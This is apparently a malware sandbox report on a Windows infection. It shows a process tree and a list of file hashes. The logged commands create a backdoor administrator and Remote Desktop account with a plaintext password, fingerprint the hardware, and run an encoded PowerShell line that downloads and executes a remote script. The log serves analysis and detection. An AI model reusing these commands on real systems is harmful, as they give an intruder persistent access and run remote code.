C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵PID:1356
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵PID:1132
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵PID:852
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵PID:1176
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵PID:4052
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵PID:1184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵PID:3168
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc n6UvtOVP1⤵PID:1940
-
C:\Windows\system32\net.exenet.exe user wgautilacc n6UvtOVP2⤵PID:3560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc n6UvtOVP3⤵PID:2880
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1916
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:2208
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:2144
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:1808
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1356
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:852
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1176
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
2dfbc484274d246b95685b39d1d85a73
SHA1f390d8273f8eeb7d04e521a1c293b503998536ce
SHA256414434de279b95d644edb71c54f613b77792cb9dd4122007ddd2e8b5cdd17be1
SHA51298f33852a64beac4ecae6e2cf08d38dff3cea5c7cdc0f378f9a399ca2d6b645b8d82c46c088a85ad91b886436b88657255320ee2a41df0879f099d9356ffe457
-
MD5
88f64f83b0347a89de94d39c922de8be
SHA16f6994a18df262aad0d2b50b7e8b27b6b310b7a4
SHA2562f642e4a8b22ad149697df770a1f5d1d87aec3d8b2320b867597ebfd5e3d8fd5
SHA5129450effe8020f6a8adc840566639f2e5f6942217ae56182af7af5de441bc7ed37b97da983281e7d8b17ab9f6334c79269c94588f14ff61010d1b1c2b27c754a8
-
MD5
7d4057365f857501253e0273336b7256
SHA162375a5303e4a59e95cf7e0072cd58efa187b7f2
SHA256003e6c8d0f15c6eb4738ea99f9fd99457d43d65e9d4f15506446db4b51b02079
SHA5127059a22ba6020db18f7b86e09b816bedd0a9f208818dcb98c69a647f6aee18ffaf4c60c3725bdfa8a354a7244b9c32fc07c3fc0d807ca39dda69842681a9fd6c
-
MD5
88f64f83b0347a89de94d39c922de8be
SHA16f6994a18df262aad0d2b50b7e8b27b6b310b7a4
SHA2562f642e4a8b22ad149697df770a1f5d1d87aec3d8b2320b867597ebfd5e3d8fd5
SHA5129450effe8020f6a8adc840566639f2e5f6942217ae56182af7af5de441bc7ed37b97da983281e7d8b17ab9f6334c79269c94588f14ff61010d1b1c2b27c754a8
-
MD5
109dfda879c2954ab2c86c465af694b1
SHA1318bec946966f6640d4a8cc2f615d8ff46e0e598
SHA25674a6499a65d4b1df96a8db88714fb75f6ffe99b84d39c4d492ec840df0f9bf67
SHA512afb8077b538ce66fe6c998e10699369f7151ba35e78e08c5cc82d78f48c0662bf729f2a0dd666dc755841a939c1212ddc55132ab4ae441f341dfa01122bfe977
-
MD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
MD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
MD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
MD5
e7173515ef44feb1ee618484b7743e93
SHA18f976bf1da030655afd0f43e0a357a58a2ea9178
SHA2567875f52e1f97a463783456b6b3c2dbc85f183534b5281ba72b0574529139d86b
SHA51241830f7036e32679bf274c67390dd6bca9f6286ee8d3144d0e57ca39fdca1ec1a8273fb528ffed819444b183067ab6078bfaa0e82d16deed3fac47a1cf027361
-
MD5
95564bb3195d0e6212166252031905c6
SHA10ec9abf3449221a6bba295e592d91e18ca8c6e98
SHA2565571e382fbdafd85dba0dae53b5edd5e1f005c0e452b5df35eeccc37f1caf1e8
SHA51227efdd8e8e0aade58deb6bf4fd6e0fc1d2907bd1019ecd89648380fde69d4211b5213dca548cbe8800e2d1f5fdb62a364e7311a0f8393cb22663ebe3af92991b
-
MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
MD5
91f2ffa1c3ed8abba9ce6a3a8f63ae61
SHA10686c03aedfa4a0a17397da8dbb7e73cea42fa33
SHA256069a95878671a32398ba592ad95049a9bff8b727849465d73c17382eb53869f8
SHA51291473dfbf6b058b9ff70b38b1a7c82046b130c44e349e90b97eb651198b0a64a201ea64b03877e3179b2cb8c729a9fb0a54c408206d8f06c8a71197d3fba93ae
-
MD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
MD5
fddc192a7202700523abca2181e381ff
SHA12e9dc45d95b1709d9c916659707080038ff30bb2
SHA2562ba72332376b66c49b7ed12ad090e2814c5cb5a0282a870a7d5f8fe29c4be944
SHA51204a6a5de331430f6e5e93a93df3e983d11ae08387888dd3fd318f163a7361f5fcec3ae3f26fc3dbd1275765950182801c7566736497f50f0395b0407eb53f22d
-
MD5
b9d40d12f521cfe49ac35b6048ced8f1
SHA10c55968f67fb0773d4871de7182ce1f621527da4
SHA2564be8c5939401129c5c04c7c5f20dbca2ad7368cb7411698a8c70dbd2a6e7246a
SHA512ce3bf88cb518ef911d015c739dab25b8e761c833b0dc57f392f69f1de701eb139eabbb2b294be9efa15f2331361ef409456101f7b5004bd4324993865d6d5f70
-
MD5
7ddf5fb0ee8289cc286b454a7b53a603
SHA1065aeffcc062d442671b3f67df6473bee9367b3a
SHA2568f55881188f7be83a94148b548fee913bde5d658ea462dd9e4dc5945e41197e7
SHA5127783144e8b92512d4e9bf23664d56bdab30f3c97a3e7d31d4ca233f7f47bd69983e7f5f9f2469b420146460ae514b9c891a66aad06077f06d1df1cf9b15581a4
-
MD5
667d42e1a5ba6c7a929e8e77262a9861
SHA1dd73058c4d6b851f3c347410342a0b7a9b2a689a
SHA256a6a996d5e38ac43969a5151393e87aa85b79d1a5bb4449ca1328c610e8803a1c
SHA5127fb5611eba143a32faf3e20637c649ed78535578f7f64750b52586b3fbf738ad07a40f61fe7840204a7ee8d42fb75d7e6213579c7f4df114f3e135e72825bb53